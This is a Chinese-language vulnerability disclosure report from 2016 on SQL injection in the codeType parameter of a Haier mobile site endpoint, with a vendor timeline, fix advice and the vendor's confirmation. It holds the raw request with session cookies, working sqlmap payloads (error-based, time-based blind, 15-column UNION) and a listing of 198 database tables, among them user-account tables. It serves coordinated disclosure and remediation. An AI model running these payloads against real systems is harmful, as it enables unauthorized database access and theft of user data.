2016-03-27: 细节已通知厂商并且等待厂商处理中 2016-03-28: 厂商已经确认,细节仅向厂商公开 2016-04-07: 细节向核心白帽子及相关领域专家公开 2016-04-17: 细节向普通白帽子公开 2016-04-27: 细节向实习白帽子公开 2016-05-12: 细节向公众公开
POST /snaplb/anonymous/topic/portal/getinfo/menulevel.ajax HTTP/1.1Content-Length: 165Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://m.rrs.com/Cookie: JSESSIONID=6BB715282853FBB57DCF1DFE2D7962E4; rrs.com_ehaier_sessionid=FEDF8DA0437C291AEE6EDC3567778935; rrs.com_ehaier_refererUrl=aHR0cDovL20ucnJzLmNvbS9tb2JpbGUvaXRlbWxpc3QvODEyLTgyOC5odG1s; rrs.com_ehaier_loginReturnUrl="aHR0cDovL20ucnJzLmNvbS9ycnNtL2pzL3VzZXJDZW50ZXIvdG9waWNUcmVuZHMuanM="; RRSSESS=nbktcaight0u9lpntcj7sa9734; laravel_session=eyJpdiI6InRVZXJTejJrMDFDMjVSOFNiSzBQdmc9PSIsInZhbHVlIjoiSWpVaFgwR1RPMkxVQnRNK2o4UmQ4dGJFZFJITkhqbXhLNDFBM284UUlCUVQwaGt5MjVCakhQbVFPSGdNYjZrbjBJSlZRcWRGTnN3eHlkZVdmdXNNb2c9PSIsIm1hYyI6IjVlYWZlZTMxZDAyYmU4ZmJkYzBjNjFhMzAwOGI4Mjk0NmY5OTA0YmJiNjAyZWI5NGVjN2IwYzliZmUzYzU1NjQifQ%3D%3D; JSESSIONID=4569D02C11EF71F0CAFB0F0A7690BFD8; Hm_lvt_e1b611e8ea607634925d9684f4e559e5=1458241583,1458241633,1458241909,1458241976; Hm_lpvt_e1b611e8ea607634925d9684f4e559e5=1458241976; ZXKJSESSIONID=c0c62de1-1343-ad45-7421-f971c94ccdd0***1; UniqueName=c0c62de1-1343-ad45-7421-f971c94ccdd0; _jzqa=1.560472377653304000.1458241583.1458241583.1458241583.1; _jzqc=1; _jzqx=1.1458241583.1458241583.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqb=1.25.10.1458241583.1; _qzja=1.926454417.1458241583146.1458241583146.1458241583146.1458245661078.1458245666164.%257B%257B_USER__name%257D%257D.1.0.25.1; _qzjb=1.1458241583146.25.0.0.0; _qzjc=1; _qzjto=25.1.0; HMACCOUNT=95BFDBC323634449; BAIDUID=ED24CCC23C3BE7686BBE72E1E8129867:FG=1; _gsref_113428431=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _gscu_113428431=58241636ioblyg52; _gscs_113428431=582416367giz1z52|pv:4; _gscbrs_113428431=1; NTKF_T2D_CLIENTID=guest13D5BCDF-B906-C5F7-5BE1-A56637825F9A; nTalk_CACHE_DATA={uid:he_1000_ISME9754_guest13D5BCDF-B906-C5,tid:1458241708410836,opd:1}; 
Hm_lvt_504222469397f794ea8da61f8a4e10e2=1458245176,1458245416,1458245661,1458245666; Hm_lpvt_504222469397f794ea8da61f8a4e10e2=1458245666; SERVERID=517c5a75fca63025cdd23cd01677fbf1|1458242592|1458242592; nTalk_PAGE_MANAGE={|m|:[{|58675|:|417586|}],|t|:|03:09:18|}; v=HRJ>/T(eXv:I(</%cy0e; PHPSESSID=jmrh61au3951s6mclpce3c12j1; Hm_lvt_972125b56f85b5c6ce2c83fd9305649e=1458245416,1458245421,1458245661,1458245666; Hm_lpvt_972125b56f85b5c6ce2c83fd9305649e=1458245666; _pzfxuvpc=1458243216321%7C1051074224135473284%7C9%7C1458245666128%7C1%7C%7C1177309196129166193; _pzfxsvpc=1177309196129166193%7C1458243216321%7C9%7Chttp%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); __xsptplus163=163.1.1458243218.1458245666.20%233%7Cwww.acunetix-referrer.com%7C%7C%7C%7C%23%23KWrgyHYXnfCeTmB1b91bKeoAudzdq5II%23; zid=3a2785ab348b7423d172a4984f56be00; avr_137032388_0_0_4294901760_271286987_0=1846284221_55418697Host: m.rrs.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*codeType=1&codeTypeName=&parent=
codeType 参数存在 SQL 注入:从 sqlmap 的 payload(`codeType=1' AND ... AND 'rxoO'='rxoO`)可以看出,该参数被作为字符串直接拼接进 SQL 语句,未做转义或参数化。sqlmap 以三种独立方式确认了注入点——MySQL 报错注入、基于 SLEEP(5) 的时间盲注、以及 15 列的 UNION 联合查询——后端数据库为 MySQL >= 5.0,当前库 snap_haier 共 198 张表可被直接枚举,其中包括 user_account、userprofile、user_address、login_record 等名称上涉及用户数据的表。接口路径位于 /snaplb/anonymous/ 之下,从命名推测可能无需登录即可访问(待厂商确认);另注意请求 Cookie 中含 acunetix-referrer.com 字样,说明该请求取自扫描器流量,复现时可将 Cookie 精简后再验证。修复建议:对 codeType 使用预编译语句(PreparedStatement)绑定参数,并在进入 SQL 之前按业务含义校验为整数;同一接口的 codeTypeName、parent 参数若走相同拼接逻辑,应一并修复。
sqlmap resumed the following injection point(s) from stored session:---Parameter: codeType (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: codeType=1' AND (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(3647=3647,1))),0x7170787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rxoO'='rxoO&codeTypeName=&parent= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: codeType=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jxRE) AND 'MbDQ'='MbDQ&codeTypeName=&parent= Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: codeType=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7071,0x6c644472464b666b494e,0x7170787071),NULL,NULL,NULL,NULL,NULL-- &codeTypeName=&parent=---back-end DBMS: MySQL >= 5.0.0Database: snap_haier[198 tables]+---------------------------------------+| activity_clean_code_data || area_data || area_data_bak || area_data_bak_13121101 || attachment || attitude_of_user_toward_object || attitude_statistics_toward_object || best_service_case || blog_attachment || blog_attachment_download_record || blog_comment || blog_excellent_record || blog_image || blog_lightblog || blog_lightblog_statistics || blog_like_record || blog_report_record || branch_record || city_data_weather || cms_base || cms_base_content_ref || cms_content || cms_content_top || code || comment_guide_info_pc || comment_guide_info_tbl || common_click_count || content_filter_word || credit_blog_record || credit_contribution_record || credit_record || credit_setting || daily_recommend || ds_business_oppo_et || ds_room_picture_et || ds_room_picture_et_copy || dynamic_image || faq_content || feed || feed_all_inbox || feed_followed_inbox || feed_followed_personal_inbox || feed_follower_personal_about_me_inbox || feed_follower_personal_inbox || feed_integrated_inbox || feed_topic_followed_inbox || 
feed_topic_inbox || feed_topic_personal_inbox || following_count || following_log || following_relation || gf_gift_receive_record_et || gift_packs || gift_packs_detail || gift_packs_user_ref || hot_lightblog_historical || hot_lightblog_monthly || hot_lightblog_weekly || interact_topic || interact_topic_category || interact_topic_comment || interact_topic_count || interact_topic_four_type || interact_topic_good || interact_topic_vote || invitation || invitation_authority || leave_message_tbl || lg_interface_invoke_et || lg_interface_invoke_ht || lg_job_et || login_record || ls_appraise_record_et || ls_appraise_record_ht || ls_workorder_et || ls_workorder_ht || ls_workorder_waiter_et || magnetic_stripe_table || monthly_top20_blogs || mytest || notification || notification_template || parameters_config || personal_setting_item || personal_setting_item_spec || personal_setting_value_spec || prize || product_failure || product_pic || product_register_record || recommendation || refered_user_recent_record || register_invitation_code || register_temporary_record || rel_wiki_hotkey || rel_wiki_one || sh_experience_comment_et || sh_experience_praise_et || sh_experience_recommend_et || sh_experience_recommend_ht || sh_experience_statistics_et || sh_free_comment_et || sh_haier_back_record || sh_user_win || sh_user_win_comment_et || sh_user_win_praise_et || share_stuff || share_stuff_comment || share_stuff_good || share_stuff_tags || social_assess_record || st_appraise_record || st_social_assess_record || st_workorder || star_shop_table || strainer_record || sys_data || sys_mode_info || tag || tag_map || template || test || tmp_ds_room_picture_et || tmp_ls_workorder_et_bak || tmp_sh_user_win || tmp_sys_mode_info || tmp_user_hits_hot || tmp_user_integral_details_all || tmp_userprofile || tmp_userprofile_bak || topic || topic_category || topic_reply_detail || topic_statistics || topic_statistics_of_user || topic_subscription_record || topic_visit_record || unit_base_data || 
unit_base_data_bak || unit_house_data || unit_house_data_bak || unit_house_data_bak_13121101 || unit_house_data_copy || unit_house_temp || unit_shop_data || up_city_info || up_codelist || up_province_et || up_province_et_copy || user_account || user_account_copy || user_address || user_address_for_act || user_area_record || user_authority || user_business_authority || user_daily_recommend || user_friends_tbl || user_goodskill_rt || user_goodskill_rt_bak || user_hits_hot || user_integral_details_all || user_integral_details_one || user_integral_grade || user_integral_prize || user_integral_source || user_refer_record || user_regist_tbl || user_related_policy || userprofile || userprofile_achievement || userprofile_bak || userprofile_complete_degree || userprofile_education_experience || userprofile_obtain_phone_record || userprofile_project_experience || userprofile_project_experience_detail || userprofile_skill_support_record || userprofile_skill_support_statistics || userprofile_statistics || userprofile_training_experience || userprofile_work_experience || value_added_products || visit || vote || vote_detail || vote_option || vote_result || water_purifier || web_click_count || web_click_uv_count || wiki_base || wiki_base_content_ref || wiki_content || wiki_content_top || winning_info || world_cup_activity_tbl || world_cup_support_num |+---------------------------------------+
危害等级:高
漏洞Rank:15
确认时间:2016-03-28 09:17
感谢白帽子的提醒与测试,已安排人员进行处理
暂无